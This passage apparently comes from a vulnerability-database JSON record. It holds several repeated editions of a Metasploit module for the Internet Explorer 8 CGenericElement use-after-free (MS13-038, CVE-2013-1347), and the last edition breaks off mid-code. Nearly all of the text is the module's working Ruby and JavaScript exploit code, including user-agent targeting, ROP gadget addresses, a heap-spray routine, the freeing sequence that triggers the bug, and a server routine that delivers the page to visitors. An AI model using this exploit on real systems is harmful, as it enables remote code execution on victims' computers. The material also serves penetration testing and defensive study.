Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-01-04T17:56:36", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-03T08:05:03", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-03T08:05:03"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-03T08:05:03", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-03T10:05:37", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-03T10:05:37"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-03T10:05:37", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-06T20:15:02", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-06T20:15:02"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n 